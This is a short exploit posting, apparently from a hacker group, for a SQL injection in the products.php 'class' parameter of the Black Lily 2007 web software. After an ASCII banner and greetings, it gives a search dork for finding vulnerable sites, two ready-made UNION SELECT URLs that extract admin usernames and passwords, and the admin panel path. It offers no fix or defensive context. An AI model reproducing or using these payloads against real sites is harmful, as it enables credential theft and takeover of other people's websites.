Black Lily 2007 (products.php class) Remote SQL Injection Vulnerability
#######################SnIper-sa.com################################
# #
# SSSSS nnn nn ii ppppppp eeeeeeeee rrrrr #
# ss nn nn nn ii pp p ee rr rr #
#s nn nn nn ii pp p ee rr r #
# ss nn nn nn ii ppppppp ee rr rr #
# sssss nn nn nn ii pp eeeeee rrrr #
# ss nn nn nn ii pp ee rrrr #
# s nn nn nn ii pp ee rr rr #
# ss nn nnn ii pp ee rr rr #
# sssss nn nnn ii pp eeeeeeeeee rr rr #
# #
#####################VerY-SecReT####################################
####################################
found by :
VerY SecReT
###########
HomePage : WwW.SnIpEr-Sa.Com
##################
Dork : "Powered By The Black Lily 2007"
####################################
EXPLOIT:
http://victim.com/ar/products.php?class=-1%20union%20select%201,2,password,4,username%20from%20admin/*
or
http://victim.com/en/products.php?class=-1%20union%20select%201,2,3,password,username%20from%20admin/*
########################################
Admin Panel is in http://victim.com/xx/admin/
#####################################
S.GreetZ: sniper-sa.com & sniper-sa & Rafoo
#############################
thanx : shoot3r , Devil-X ,ReMOTeR , and all sniper members
##############
contact-mail : SecReT@xxxxxxxxxxxxxxx